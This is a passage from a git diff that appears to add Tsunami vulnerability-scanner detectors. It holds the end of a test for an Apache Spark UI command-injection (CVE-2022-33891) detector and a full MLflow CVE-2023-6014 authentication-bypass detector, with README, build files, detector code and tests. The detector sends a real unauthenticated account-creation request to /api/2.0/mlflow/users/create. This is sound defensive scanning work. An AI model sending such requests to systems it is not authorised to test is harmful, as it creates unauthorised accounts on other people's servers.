Cve202233891VulnDetector detector; + + @Before + public void setUp() throws IOException { + mockWebServer = new MockWebServer(); + + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder().build(), + new Cve202233891DetectorBootstrapModule()) + .injectMembers(this); + + service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("http")) + .setServiceName("http") + .build(); + + targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(forHostname(mockWebServer.getHostName())) + .build(); + } + + @After + public void tearDown() throws IOException { + mockWebServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability() throws Exception { + // It is a blind RCE, body is not important. This is a part of a valid response. + mockWebServer.enqueue( + new MockResponse() + .setBodyDelay(5, SECONDS) + .setResponseCode(403) + .setBody( + "SERVLET:org.apache.spark.ui.JettyUtils$$anon$1-7439513f\n")); + + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2022_33891")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2022-33891 Apache Spark UI RCE") + .setRecommendation( + "You can upgrade your Spark instances to 3.2.2, or 3.3.0 or later") + .setDescription( + "The Apache Spark UI has spark.acls.enable configuration option which" + + " provides capability to modify the application according to" + + " user's permissions. When the config is true, the vulnerable" + + " versions of Spark checks the group membership of the user" + + " without proper controls, that results in blind command" + + " injection in username parameter.")) + .build()); + assertThat(mockWebServer.getRequestCount()).isEqualTo(1); + } + + @Test + public void detect_ifNotVulnerable_doesNotReportVuln() throws IOException { + mockWebServer.enqueue( + new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody("Hello world!")); + + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + assertThat(mockWebServer.getRequestCount()).isEqualTo(1); + } +} diff --git a/community/detectors/mlflow_cve_2023_6014/README.md b/community/detectors/mlflow_cve_2023_6014/README.md new file mode 100644 index 000000000..38844bb9e --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6014/README.md @@ -0,0 +1,24 @@ +# MLflow CVE-2023-6014 Auth Bypass Vulnerability Detector + +This detector checks for MLflow CVE-2023-6014 Auth Bypass vulnerability. + +MLflow instances below version 2.8.0 which use MLFlow UI or MLFlow Server have +an authentication bypass vulnerability. Normally MLFlow requires authentication +for user creation operations who are served under /mlflow/users/create API. +However, due to a coding mistake, prepending /api/2.0/ to those routes will +allow access to an unauthenticated remote attacker in the vulnerable versions, +namely /api/2.0/mlflow/users/create. Therefore, unauthenticated attackers can +create users by using this endpoint and reach the functionalities of MLflow. + +- https://huntr.com/bounties/3e64df69-ddc2-463e-9809-d07c24dc1de4 +- https://nvd.nist.gov/vuln/detail/CVE-2023-6014 + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/mlflow_cve_2023_6014/build.gradle b/community/detectors/mlflow_cve_2023_6014/build.gradle new file mode 100644 index 000000000..260b8e74c --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6014/build.gradle @@ -0,0 +1,68 @@ +plugins { + id 'java-library' +} + +description = 'Tsunami CVE-2023-6014 VulnDetector plugin.' +group 'com.google.tsunami' +version '0.0.1-SNAPSHOT' + + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' + okhttpVersion = '3.12.0' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" +} diff --git a/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.jar b/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..e6441136f Binary files /dev/null and b/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.properties b/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..b82aa23a4 --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-8.7-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/mlflow_cve_2023_6014/gradlew b/community/detectors/mlflow_cve_2023_6014/gradlew new file mode 100755 index 000000000..1aa94a426 --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6014/gradlew @@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/mlflow_cve_2023_6014/gradlew.bat b/community/detectors/mlflow_cve_2023_6014/gradlew.bat new file mode 100644 index 000000000..25da30dbd --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6014/gradlew.bat @@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/mlflow_cve_2023_6014/settings.gradle b/community/detectors/mlflow_cve_2023_6014/settings.gradle new file mode 100644 index 000000000..6240035f5 --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6014/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'CVE-2023-6014' diff --git a/community/detectors/mlflow_cve_2023_6014/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014DetectorBootstrapModule.java b/community/detectors/mlflow_cve_2023_6014/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014DetectorBootstrapModule.java new file mode 100644 index 000000000..f60be8300 --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6014/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014DetectorBootstrapModule.java @@ -0,0 +1,26 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve20236014; + +import com.google.tsunami.plugin.PluginBootstrapModule; + +/** An CVE-2023-6014 Guice module that bootstraps the {@link Cve20236014VulnDetector}. */ +public class Cve20236014DetectorBootstrapModule extends PluginBootstrapModule { + @Override + protected void configurePlugin() { + registerPlugin(Cve20236014VulnDetector.class); + } +} diff --git a/community/detectors/mlflow_cve_2023_6014/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014VulnDetector.java b/community/detectors/mlflow_cve_2023_6014/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014VulnDetector.java new file mode 100644 index 000000000..b31ee09f0 --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6014/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014VulnDetector.java @@ -0,0 +1,179 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve20236014; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.common.net.HttpHeaders.CONTENT_TYPE; +import static com.google.tsunami.common.data.NetworkEndpointUtils.toUriAuthority; +import static com.google.tsunami.common.net.http.HttpRequest.post; + +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.security.SecureRandom; +import java.time.Clock; +import java.time.Instant; +import javax.inject.Inject; + +/** A {@link VulnDetector} that detects the CVE-2023-6014 vulnerability. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "CVE20236014VulnDetector", + version = "0.1", + description = Cve20236014VulnDetector.VULN_DESCRIPTION, + author = "frkngksl", + bootstrapModule = Cve20236014DetectorBootstrapModule.class) +public final class Cve20236014VulnDetector implements VulnDetector { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private static final String VUL_PATH = "api/2.0/mlflow/users/create"; + @VisibleForTesting static final String DETECTION_STRING = "Successfully signed up user:"; + + @VisibleForTesting + static final String VULN_DESCRIPTION = + "On MLflow versions prior to 2.8.0, unauthenticated users are able to arbitrarily create an" + + " account in MLflow server or MLflow UI by bypassing any authentication requirement.\n"; + + private final HttpClient httpClient; + private final Clock utcClock; + + private static final String ALPHA_NUMERIC_STRING = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; + private static final SecureRandom secureRandom = new SecureRandom(); + + public static String GenerateRandomString(int length) { + StringBuilder builder = new StringBuilder(); + for (int i = 0; i < length; i++) { + int index = secureRandom.nextInt(ALPHA_NUMERIC_STRING.length()); + builder.append(ALPHA_NUMERIC_STRING.charAt(index)); + } + return builder.toString(); + } + + @Inject + Cve20236014VulnDetector(@UtcClock Clock utcClock, HttpClient httpClient) { + this.httpClient = checkNotNull(httpClient); + this.utcClock = checkNotNull(utcClock); + } + + private static boolean isWebServiceOrUnknownService(NetworkService networkService) { + return networkService.getServiceName().isEmpty() + || NetworkServiceUtils.isWebService(networkService) + || NetworkServiceUtils.getServiceName(networkService).equals("unknown"); + } + + private static StringBuilder buildTarget(NetworkService networkService) { + StringBuilder targetUrlBuilder = new StringBuilder(); + if (NetworkServiceUtils.isWebService(networkService)) { + targetUrlBuilder.append(NetworkServiceUtils.buildWebApplicationRootUrl(networkService)); + } else { + targetUrlBuilder + .append("https://") + .append(toUriAuthority(networkService.getNetworkEndpoint())) + .append("/"); + } + return targetUrlBuilder; + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + logger.atInfo().log("CVE-2023-6014 starts detecting."); + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(Cve20236014VulnDetector::isWebServiceOrUnknownService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean isServiceVulnerable(NetworkService networkService) { + String targetVulnerabilityUrl = buildTarget(networkService).append(VUL_PATH).toString(); + try { + String randomUsername = GenerateRandomString(10); + String randomPassword = GenerateRandomString(10); + + logger.atInfo().log("Attempting to create a user (%s: %s)", randomUsername, randomPassword); + String stringPayload = "username=" + randomUsername + "&password=" + randomPassword; + ByteString bytePayload = ByteString.copyFromUtf8(stringPayload); + HttpResponse httpResponse = + httpClient.send( + post(targetVulnerabilityUrl) + .setHeaders( + HttpHeaders.builder() + .addHeader(CONTENT_TYPE, "application/x-www-form-urlencoded") + .build()) + .setRequestBody(bytePayload) + .build(), + networkService); + logger.atInfo().log("Response: %s", httpResponse.bodyString().get()); + if (httpResponse.status().code() == 200 + && httpResponse.bodyString().get().contains(DETECTION_STRING)) { + return true; + } + } catch (IOException | AssertionError e) { + logger.atWarning().withCause(e).log("Request to target %s failed", networkService); + return false; + } + return false; + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2023_6014")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2023-6014 MLflow Auth Bypasss Vulnerability") + .setRecommendation( + "Update the MLflow instances to a version that provides a fix which is newer" + + " than version 2.8.0, and check the user list for potential users that" + + " were created by exploiting this vulnerability.") + .addRelatedId( + VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2023-6014")) + .setDescription(VULN_DESCRIPTION)) + .build(); + } +} diff --git a/community/detectors/mlflow_cve_2023_6014/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014VulnDetectorTest.java b/community/detectors/mlflow_cve_2023_6014/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014VulnDetectorTest.java new file mode 100644 index 000000000..a4775c349 --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6014/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014VulnDetectorTest.java @@ -0,0 +1,145 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve20236014; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.Software; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TransportProtocol; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for {@link Cve20236014VulnDetector}. */ +@RunWith(JUnit4.class) +public class Cve20236014VulnDetectorTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + + @Inject private Cve20236014VulnDetector detector; + + private MockWebServer mockWebServer; + + @Before + public void setUp() { + mockWebServer = new MockWebServer(); + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new Cve20236014DetectorBootstrapModule(), + new HttpClientModule.Builder().build()) + .injectMembers(this); + } + + @After + public void tearDown() throws IOException { + mockWebServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability() throws IOException { + mockWebResponse(Cve20236014VulnDetector.DETECTION_STRING); + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("http")) + .setServiceName("http") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(forHostname(mockWebServer.getHostName())) + .build(); + + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2023_6014")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2023-6014 MLflow Auth Bypasss Vulnerability") + .setRecommendation( + "Update the MLflow instances to a version that provides a fix which is" + + " newer than version 2.8.0, and check the user list for potential" + + " users that were created by exploiting this vulnerability.") + .addRelatedId( + VulnerabilityId.newBuilder() + .setPublisher("CVE") + .setValue("CVE-2023-6014")) + .setDescription(Cve20236014VulnDetector.VULN_DESCRIPTION)) + .build()); + } + + @Test + public void detect_whenNotVulnerable_returnsNoVulnerability() throws IOException { + mockWebResponse("Hello World"); + ImmutableList httpServices = + ImmutableList.of( + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build()); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(forHostname(mockWebServer.getHostName())) + .build(); + + DetectionReportList detectionReports = detector.detect(targetInfo, httpServices); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + private void 